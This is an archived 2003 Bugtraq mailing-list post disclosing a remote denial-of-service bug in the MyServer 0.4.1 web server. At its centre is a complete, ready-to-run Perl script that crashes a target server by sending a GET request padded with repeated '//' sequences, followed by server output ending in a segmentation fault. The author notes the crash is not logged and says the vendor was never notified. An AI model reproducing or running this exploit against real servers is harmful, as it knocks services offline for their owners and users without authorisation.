Myserver 0.4.1 DOS..

• Previous message: Frog Man: "pMachine (PHP) : Include() Security Hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Sun, 22 Jun 2003 00:37:00 +0100 (BST)
To: bugtraq@securityfocus.com

hi...

Topic: MyServer 0.4.1 DOS

Product: Myserver 0.4.1 (http://myserverweb.sourceforge.net)

Note: yep, I'm on the dole, anyone wanna give me a job :)

Vendor Notification: Woooops, sorry i forgot ;)

Background:

(from homepage)
MyServer is a free and easy to configure web server. MyServer is licensed
under the GNU General Public License (GPL). See the license page for
additional info.
Myserver runs under both Windows and Linux..
Although there is allready several found flaws in Myserver, I thought that
the closet bug to this was:
http://www.securityfocus.org/bid/7770/info/

but that was using excessive amounts of data.. We only need to use 20 "//"
to cause a Dos condition..

Problem Description:

When Myserver is running a simple GET request can cause a Remote Denial of
service, stopping the HTTP server
alltogether..
Also an extra note, this DOS doesn't get entered into the log file ;)

Impact:

Denial of service..possible code execution, haven't tested it fully
yet..still finding holes ;)

Patch:

Nope i don't do patches.... ;)

Exploit:
----------------myserver.pl------------------------
#!/usr/bin/perl
 
#Myserver 0.4.1 Remote Denial of service ;)
#oh joy...
#deadbeat, uk2sec
#eip@oakey.no-ip.com
#deadbeat@sdf.lonestar.org
 
use IO::Socket;
$dos = "//"x100;
$request = "GET $dos"."HTTP/1.0\r\n\r\n";
 
$target = $ARGV[0];
 
print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
print "deadbeat, uk2sec..\n";
print "usage: perl $0 <target>\n";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>"80",
        PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";
print $sox $request;
sleep 2;
close $sox;
print "Done...\n";
------------------EOF--------------------------

Looks like this from the server side:
-------------------------
**************************************
************myServer 0.4.1************
**************************************
Initializing server configuration...
Using english language
Server configuration terminated
Security access is not used, the web folder contents is accessible to
anyone
Initializing socket library...
Socket library was initialized
Computer name is: uk2sec-labs.no-ip.com
IP Address #0: 192.168.0.1
Loading MIME types...
MIME types loaded successfully: 139
Number of processors: 1
Creating thread 0...
Thread created
Creating listening thread...
Creating server socket...
Server socket created
Trying to binding port...
Port is binded
Trying to listen on port...
Listen on port: 80
Listening thread is created
myServer is now ready to accept connections
Press Ctrl+C to break execution
Segmentation fault
--------------------------

Tested on: Linux (redhat 9.0)
        

hello:
bazarr, good luck out there man ;)

regards,

deadbeat

• Previous message: Frog Man: "pMachine (PHP) : Include() Security Hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]